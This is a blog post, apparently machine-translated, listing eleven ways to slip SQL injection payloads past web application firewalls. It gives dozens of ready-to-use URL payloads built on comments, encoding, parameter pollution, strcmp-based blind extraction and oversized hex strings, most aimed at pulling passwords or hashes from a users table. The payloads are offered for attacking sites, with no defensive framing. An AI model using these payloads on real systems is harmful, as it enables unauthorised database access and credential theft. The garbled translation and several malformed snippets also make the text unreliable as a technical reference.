WAF bypass technology in SQL injection

Bystander
Blog: http://leaver.me
Forum: French Forum

Directory

1. Case-insensitive Bypass

2. Simple code Bypass

3. Comment Bypass

4. Separating override Bypass

5.Http parametric contamination (HPP)

6. Using the logical operator Or/and bypass

7. Compare operator substitution

8. Replace with function function

9. Blinds without OR AND and

10. Parentheses

11. Buffer Overflow Bypass

1. Case-insensitive Bypass
This is very familiar to everyone, for some of the too garbage WAF effect is significant, such as blocking the union, then use Union union and so on. Bypass

2. Simple code Bypass
such as the WAF detection keyword, then we let him not detect it. For example, to test the union, then we use%55 that is U 16 binary code instead of U, union written%55nion, combined with case can also bypass some WAF, you can arbitrarily replace one or a few can be.

There are also people in the MySQL injection, such as the table name or load file, the file name or indicate that the 16 encoding to bypass the WAF belongs to this category.

3. Comment Bypass
This is a relatively small situation and applies to WAF just filtering a dangerous statement without blocking our entire query

/?id=1+union+select+1,2,3/*

For example, for the above query, WAF filters a union and select, then we write a comment before the statement, let him put the comments inside the filter out, does not affect our query:
So the bypass statement is:

/?id=1/*union*/union/*select*/select+1,2,3/*

There is also an annotation-related bypass:
Like what

Index.php?page_id=-15/*! union*//*! select*/1,2,3,4 ....

You can see, as long as we put the sensitive words into the note, note that the front to add one!

4. Separating override Bypass
Or the above example, which applies to a WAF that uses regular expressions, detects all the sensitive words, but doesn't care where you write, and filters several.
We can separate the sensitive words by comments so that the WAF's regular does not work, and the query does not affect our results.

/?id=1+un/**/ion+sel/**/ect+1,2,3–

As for the rewrite bypass, which applies to the WAF filtering once, and as we upload the aaspsp horse principle, we can write something like ununionion. Once the union is filtered, our query is executed.

? id=1 ununionion Select 1,2,3–

5. HTTP parameter Contamination (HPP)
For example, we have this statement:

/?id=1 Union select+1,2,3+from+users+where+id=1–

We can repeat the previous ID value to add our value to bypass, &id= will become a comma at query time

/?id=1 Union select+1&id=2,3+from+users+where+id=1–

This condition is more successful, depending on the specific WAF implementation.

Give an example to illustrate the usage

/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users–

The specific analysis of the query is related to the background code writing.
For example, the server is written like this:

SELECT * FROM table where a= ". $_get[' a ']." and b= ". $_get[' B ']." Limit ". $_get[' C ';

Then we can construct such an injection statement:

/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users–

The final resolution is:

SELECT * FROM table where a=1 union/* and b=*/select 1,pass/*limit */from users–

Can be seen, this way is actually more suitable for white box testing, and for the black box infiltration, it is more troublesome to use. But you can try it.

6. Using the logical operator Or/and bypass

/?id=1+or+0x50=0x50
/?id=1+and+ascii (Lower (Mid ((select+pwd+from+users+limit+1,1), 1, 1)) =74

By the way, explain the second sentence, starting from the innermost parenthesis, select+pwd+from+users+limit+1,1 this sentence is the first record of the PWD field from the users table, such as admin,
Then mid (the previous sentence), the first character of the admin is taken, that is, a,
Lower (the previous sentence) is to convert the character to lowercase,
Then ASCII is to convert a to ASCII code, see not equal to 74.

7. Compare operator substitution
Including! = does not equal,<> not equal to,< less than,> greater than, these can be used to replace = to bypass,
For example, the previous example, to determine whether it is 74, assuming = is filtered, then we can determine whether it is greater than 73, is not less than 75, and then know is 74. Many WAF will forget this.

8. Replace with function function
Substring () can be replaced with the functions of mid (), substr (), which are used to take a certain bit of a character string.
ASCII () encoding can be replaced with hex (), Bin (), which is 16 binary and binary encoding
Benchmark () can be replaced with sleep (), both of which are used in delay-based blinds, giving you the opportunity to introduce
If it's blocked, there's a new way

SUBSTRING ((SELECT ' Password '), () = 0x70
substr ((SELECT ' Password '), () = 0x70
Mid ((SELECT ' Password '), 0x70) =

For example, these three, are judged from the password of the first character value, you can use

strcmp (Left (' password ', 1), 0x69) = 1
strcmp (Left (' password ', 1), 0x70) = 0
strcmp (Left (' password ', 1), 0x71) = 1

To replace, left is used to take the string 1-bit value, strcmp is used to compare two values, if the comparison result is equal to 0, the left side is 1, otherwise 1
And the Group_concat and Concat and Concat_ws, which I've talked about before, can replace each other.

9. Blinds without OR AND and
For example, there is an injection point:

Index.php?uid=123

And or is filtered, in fact there is a more straightforward way, we directly modify the 123 generated for our statement,

INDEX.PHP?UID=STRCMP (Left ((select+hash+from+users+limit+0,1), 1), 0x42) +123

123 when the page is correct, we are now blind guess the first bit of hash, if the first bit equals 0x42 is B, then the strcmp result is 0,0+123=123, so the page should be correct. Otherwise it means not B, so guess, not and and OR.

10. Parentheses

/?id=1+union+ (Select+1,2+from+users)

For example, the above article was intercepted by a WAF. You can try adding some parentheses.

/?id=1+union+ (SELECT+1,2+FROM+XXX)
/?id= (1) Union (SELECT (1), Mid (hash,1,32) from (users)
/?id=1+union+ (SELECT ' 1′,concat (login,hash) from+users)
/?id= (1) Union ((((((((1), Hex (hash) from (users)))))))
/?id= (1) or (0x50=0x50)

Finally, personal ability is limited after all, some also can not think of, think up the words to add. At the same time welcome everyone to correct, add.

11. Buffer Overflow Bypass
Just wrote to forget about this. This is from a foreign blog to see.

Id=1 and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAA) +union+select+1,2,version (), 4,5,database (), User (), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
, 27,28,29,30,31,32,33,34,35,36–+

Where 0xAAAAAAAAAAAAAAAAAAAAA here a more the better. General requirements of more than 1000

WAF bypass technology in SQL injection